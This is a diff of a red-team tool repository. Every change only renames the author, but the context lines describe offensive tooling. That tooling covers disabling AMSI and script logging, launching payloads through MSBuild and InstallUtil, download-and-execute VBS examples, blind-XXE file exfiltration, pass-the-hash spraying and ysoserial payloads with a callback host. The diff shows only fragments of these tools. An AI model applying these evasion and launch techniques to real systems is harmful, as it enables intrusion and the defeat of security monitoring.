# This script requires PowerView 3.0 dev branch # This script requires PowerView 3.0 dev branch

View File

@ -5,7 +5,7 @@
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way. Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None

View File

@ -5,7 +5,7 @@
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way. Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None

View File

@ -5,7 +5,7 @@
files for later processing. This script is compatible with newest PowerView's version, files for later processing. This script is compatible with newest PowerView's version,
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets. from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
Author: Mariusz B. (mgeeky), '18 Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1 Required Dependencies: PowerSploit's Recon.psm1
#> #>

View File

@ -1,7 +1,7 @@
#requires -version 2 #requires -version 2
<# <#
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerView.ps1 Required Dependencies: PowerView.ps1
Optional Dependencies: None Optional Dependencies: None
@ -12,7 +12,7 @@ function Get-DomainOUTree
<# <#
.SYNOPSIS .SYNOPSIS
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerView.ps1 Required Dependencies: PowerView.ps1
Optional Dependencies: None Optional Dependencies: None
@ -65,7 +65,7 @@ function Get-NetOUTree
<# <#
.SYNOPSIS .SYNOPSIS
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerView.ps1 Required Dependencies: PowerView.ps1
Optional Dependencies: None Optional Dependencies: None

View File

@ -8,7 +8,7 @@
PS> . .\Get-UserPasswordEntries.ps1 PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries PS> Get-UserPasswordEntries
Mariusz B. / mgeeky Mariusz Banach / mgeeky
#> #>
# This script requires PowerView 3.0 dev branch # This script requires PowerView 3.0 dev branch

View File

@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:) (implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky Re-implemented, enhanced by: Mariusz Banach, mgeeky
----- -----
[.] Step 0. Planted DLL files in: [.] Step 0. Planted DLL files in:
@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE. [?] File not recognized as PE/EXE.
@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
<!-- Based on Casey Smith work, Twitter: @subTee --> <!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility --> <!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> --> <!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV"> <Target Name="btLDoraXcZV">
<hwiJYmWvD /> <hwiJYmWvD />
@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE. [?] File not recognized as PE/EXE.
@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com> Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[.] Will load script file: '.\Test2.ps1' [.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled. [+] AMSI Disabled.
@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so
PS D:\> .\Stracciatella.exe -v PS D:\> .\Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com> Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[-] It looks like no script path was given. [-] It looks like no script path was given.
[+] AMSI Disabled. [+] AMSI Disabled.

View File

@ -5,7 +5,7 @@
This script launches many PowerView cmdlets and stores their output This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing. in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18 Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1 Required Dependencies: PowerSploit's Recon.psm1
#> #>

View File

@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the ' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching. ' local filesystem and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '

View File

@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the ' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching. ' local filesystem and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '

View File

@ -2,7 +2,7 @@
' Example of dropping an embedded, base64 encoded binary file to the disk, ' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching. ' decoding it and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '

View File

@ -2,7 +2,7 @@
' This script uses WMI class' Win32_Process static method Create to ' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12). ' execute given command in a hidden window (ShowWindow = 12).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '

View File

@ -2,7 +2,7 @@
' This script uses classic WScript.Shell Run method to ' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0) ' execute given command in a hidden window (second param = 0)
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '

View File

@ -3,7 +3,7 @@
' execute given command in a hidden window via StdIn passed to a dedicated ' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example). ' launcher command (powershell.exe in this example).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '

View File

@ -12,7 +12,7 @@
# - raw Shellcode in a separate thread via CreateThread # - raw Shellcode in a separate thread via CreateThread
# - .NET Assembly via Assembly.Load # - .NET Assembly via Assembly.Load
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, <mb@binary-offensive.com>
# #
import re import re
@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
<!-- Based on Casey Smith work, Twitter: @subTee --> <!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility --> <!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> --> <!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName"> <Target Name="$taskName">
<$templateName /> <$templateName />
@ -584,7 +584,7 @@ def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''') ''')
if len(argv) < 2: if len(argv) < 2:

View File

@ -7,7 +7,7 @@
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your # script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
# future use of BloodHound. # future use of BloodHound.
# #
# Mariusz B. / mgeeky # Mariusz Banach / mgeeky
# #
import sys import sys

View File

@ -3,7 +3,7 @@
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee --> <!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml --> <!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
<!-- Modified by Mariusz B. / mgeeky. --> <!-- Modified by Mariusz Banach / mgeeky. -->
<Target Name="MyLittleInlineTaskName"> <Target Name="MyLittleInlineTaskName">
<MyLittleInlineTask /> <MyLittleInlineTask />

View File

@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile> usage: .\generateRogueDotNet.py [options] <inputFile>
@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode. [?] File specified as raw Shellcode.

View File

@ -34,7 +34,7 @@
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, <mb@binary-offensive.com>
# #
import re import re
@ -519,7 +519,7 @@ def getSourceFileContents(
/* /*
Author: Casey Smith, Twitter: @subTee Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com> Customized by: Mariusz Banach / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk Step 1: Create Your Strong Name Key -> key.snk
@ -806,7 +806,7 @@ def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''') ''')
if len(argv) < 2: if len(argv) < 2:

View File

@ -31,7 +31,7 @@
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false # mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
# #
# #
# Mariusz B., 2016 # Mariusz Banach, 2016
# #
@ -132,7 +132,7 @@ def parseOptions(argv):
print(''' print('''
:: Blind-XXE attacker's helper backend component :: Blind-XXE attacker's helper backend component
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities. Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')

View File

@ -1,7 +1,7 @@
#!/usr/bin/python #!/usr/bin/python
# #
# Padding Oracle test-cases generator. # Padding Oracle test-cases generator.
# Mariusz B. / mgeeky, 2016 # Mariusz Banach / mgeeky, 2016
# v0.2 # v0.2
# #
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition # Simple utility that aids the penetration tester when manually testing Padding Oracle condition
@ -277,7 +277,7 @@ def hex_dump(data):
def main(): def main():
info('\n\tPadding Oracle test-cases generator') info('\n\tPadding Oracle test-cases generator')
info('\tMariusz B. / mgeeky, 2016\n') info('\tMariusz Banach / mgeeky, 2016\n')
if len(sys.argv) < 2: if len(sys.argv) < 2:
warning('usage: padding-oracle-tests.py <data> [blocksize]') warning('usage: padding-oracle-tests.py <data> [blocksize]')

View File

@ -14,7 +14,7 @@
* to add forced redirection to the target site. * to add forced redirection to the target site.
* *
* Authors: * Authors:
* Mariusz B. / mgeeky * Mariusz Banach / mgeeky
* Jakub M. / unkn0w * Jakub M. / unkn0w
* *
* Version: * Version:

View File

@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d
:: Cracking the Lens pingback responding server :: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
[-] You shall specify all needed MySQL connection data either via program options or config file. [-] You shall specify all needed MySQL connection data either via program options or config file.
[+] Database initialized. [+] Database initialized.

View File

@ -211,7 +211,7 @@ def parseOptions(argv):
print(''' print('''
:: Cracking the Lens pingback responding server :: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')

View File

@ -18,7 +18,7 @@
# - jwt # - jwt
# - anytree # - anytree
# #
# Mariusz B., 2018 # Mariusz Banach, 2018
# #
import os import os

View File

@ -26,7 +26,7 @@
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000 # $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
# :: ysoserial payloads generation helper # :: ysoserial payloads generation helper
# Helps generate many variations of payloads to try against vulnerable application. # Helps generate many variations of payloads to try against vulnerable application.
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# v0.1 # v0.1
# #
# [+] Command within payload: # [+] Command within payload:
@ -55,7 +55,7 @@
# #
# #
# Author: # Author:
# Mariusz B., '18-19 / <mb@binary-offensive.com> # Mariusz Banach, '18-19 / <mb@binary-offensive.com>
# #
import os import os
@ -379,7 +379,7 @@ def parseOptions(argv):
print(''' print('''
:: ysoserial payloads generation helper :: ysoserial payloads generation helper
Helps generate many variations of payloads to try against vulnerable application. Helps generate many variations of payloads to try against vulnerable application.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -12,7 +12,7 @@
* Compilation: * Compilation:
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++ * C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
* *
* Mariusz B. / mgeeky, '18-'20 * Mariusz Banach / mgeeky, '18-'20
**/ **/
#include "windows.h" #include "windows.h"

View File

@ -13,7 +13,7 @@
``` ```
:: findSymbols.py - Finds PE Import/Exports based on supplied filters. :: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
usage: .\findSymbols.py [options] <path> usage: .\findSymbols.py [options] <path>
@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md
Takes an input file/folder and retypes it into focused RDP session window. Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel. That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit) Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com> <mb@binary-offensive.com>
[+] Will upload file's contents: "README.md" [+] Will upload file's contents: "README.md"

View File

@ -9,7 +9,7 @@
# - module matching name # - module matching name
# - module NOT matching name # - module NOT matching name
# #
# Mariusz B. / mgeeky, '21 # Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com> # <mb [at] binary-offensive.com>
# #
@ -436,7 +436,7 @@ def main():
out(''' out('''
:: findSymbols.py - Finds PE Import/Exports based on supplied filters. :: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
''') ''')

View File

@ -23,7 +23,7 @@
# $ ./pth-carpet.py machines.txt pwdump # $ ./pth-carpet.py machines.txt pwdump
# #
# coded by: # coded by:
# Mariusz B., 2016 / mgeeky # Mariusz Banach, 2016 / mgeeky
# version 0.2 # version 0.2
# #
# Should be working on Windows boxes as well as on Linux ones. # Should be working on Windows boxes as well as on Linux ones.
@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine):
def main(): def main():
global OPTIONS global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold'])) print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool') parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts') parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')

View File

@ -21,7 +21,7 @@
# - tqdm # - tqdm
# #
# Author: # Author:
# Mariusz B. / mgeeky (@mariuszbit), '20 # Mariusz Banach / mgeeky (@mariuszbit), '20
# <mb [at] binary-offensive.com> # <mb [at] binary-offensive.com>
# #
@ -313,7 +313,7 @@ def parseOptions(argv):
Takes an input file/folder and retypes it into focused RDP session window. Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel. That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit) Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com> <mb@binary-offensive.com>
''') ''')